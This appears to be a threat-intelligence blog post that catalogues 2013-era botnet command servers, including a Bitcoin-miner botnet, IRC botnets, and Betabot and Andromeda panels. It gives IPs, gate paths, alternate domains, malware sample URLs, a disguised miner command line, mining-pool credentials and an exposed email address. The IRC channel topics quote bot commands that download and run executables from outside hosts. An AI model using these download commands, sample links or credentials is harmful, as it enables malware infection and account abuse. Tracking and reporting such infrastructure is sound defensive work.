pool.50btc.com (Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)

Uncategorized

Resolved: [pool.50btc.com] To [144.76.52.43]
HTTP Requests: hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache

{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}

Here the hacker's miner command line (the miner runs under the name lsass.exe):
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample: hxxp://158.255.2.104/cucaz.exe
Hosting infos: http://whois.domaintools.com/144.76.52.43

122.195.244.35 (irc botnet hosted in China Nanjing Huaianwangtongdizhichi Huaian Jiangsu Province)

Server: 122.195.244.35:8888
Now talking in #!x!
Topic: Set by [Yuri (unknown address)] at (Thu May 16 09:59:25 2013)
Other channels:
Now talking in #1
Topic On: [#1 ] [ !NAZEL hxxp://146.185.246.190/7384IEP.da !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe ]
Topic By: [ p81 ]
Now talking in #2
Topic On: [ #2 ] [!NAZELturbo hxxp://146.185.246.190/7384IEP.da udos.exe | !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe yufck.exe ]
Topic By: [ p81 ]

wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)

Resolved wrightfeldhusen.info to 69.197.35.109
Server: wrightfeldhusen.info
Gate file: /beta/order.php
Alternate domains: akwebdesigner.info, websachee.info, tincorporated.info, thetwenty.info, swedishseasons.info, lommebags.info, andywilsonfs.info, ghostgames1.info, futureofwebdesign.info, vdezignstudio.info, waterworks2.info, waterworks2.com, nordkupp1.info, circusbum.info, novflex.info
This is hosted on the same server (69.197.35.109) as the Andromeda bot at www.panel-gc.co.uk described below.
Hosting infos: http://whois.domaintools.com/69.197.35.109

www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)

Resolved www.panel-gc.co.uk to 69.197.35.109
Server: www.panel-gc.co.uk
Gate file: /panel/gate.php
Plugins:
hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod
hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod
hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod
This is Andromeda 2.7, not the older cracked version.
Bitcoin mining info (miner arguments): -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo
Hosting infos: http://whois.domaintools.com/69.197.35.109

vhost.bounceme.net (irc botnet hosted in France Paris Nerim Sas)

Resolved: [vhost.bounceme.net] To [194.242.114.177]
Server: 194.242.114.177:6667
Server Password:
Username: Pmx
Nickname: aKH-4mins
Channel: #sys# (Password: )
Channeltopic:

Same guy, different domain: scan.no-ip.org (194.242.114.177)
Server: 194.242.114.177:6667
Server Password:
Username: skjcxmot
Nickname: [nLh-VNC]otkfck
Channel: sex (Password: )
Channel: #bot
Channeltopic:

Credits to x00 for samples :-)
Hosting infos: http://whois.domaintools.com/194.242.114.177